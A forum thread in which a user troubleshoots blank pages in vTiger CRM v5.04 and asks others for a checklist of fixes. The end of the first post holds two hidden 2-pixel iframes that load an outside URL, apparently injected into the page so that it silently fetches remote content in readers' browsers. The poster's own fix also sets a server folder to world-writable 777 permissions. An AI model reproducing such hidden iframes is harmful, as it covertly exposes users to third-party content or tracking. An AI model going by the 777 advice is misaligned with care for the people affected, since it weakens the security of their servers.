Blank page problem - ongoing

Twice I have had a problem with blank pages being returned from clicking on a link within vTiger.

The first one had to do with trying to add a new user to vTiger v5.04 in Settings->Users->New User->Save, the screen never refreshes and the web page returns blank. The user account also does not work. I fixed this by setting the permissions on the the user_privileges folder from 755 to 777 so that the web server could write to this folder.

The second time is now when trying to click on the My Preferences link. The page returns blank.

There seems to be so much information floating around on blank pages in vTiger. Why is this? Where is the error handling? There doesn't seem to be any cohesion or logic how different people get it working again. It's like playing roulette ...

With the great feature set of vTiger, I have wasted so much time trying to hunt down some simple steps to check why you may have blank pages. Does anyone know of like three things or so that you can check that will fix this problem definitively? Someone that can clearly and simply lay these out like a checklist? It just seems so weird to perform a function in vTiger and to have the result be a blank page with no error message or anything - just whitespace???

Please respond ... <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

Comments

• 3 Comments sorted by Votes Date Added
  • make sure that your server meets all (!) requirements as described in the installation manual
  • i appreciate the time for the response, but this is exactly what i am talking about! vague and generalized responses that really don't do much for a solution, or help to generate a useful knowledge base.

i could probably respond to every post here by saying "look at the help file" or "did you try looking at the wiki?"

the response "make sure that you read the installation manual?" is not really helpful. if you don't know, then you don't know.

there is so much of this type of response. if you look at my original post, you will see that i listed one specific:

i fixed one of my problems by setting the permissions on the user_privileges folder from 755 to 777 so that the web server could write to this folder.

anyone else that can add to the checklist?

thanks -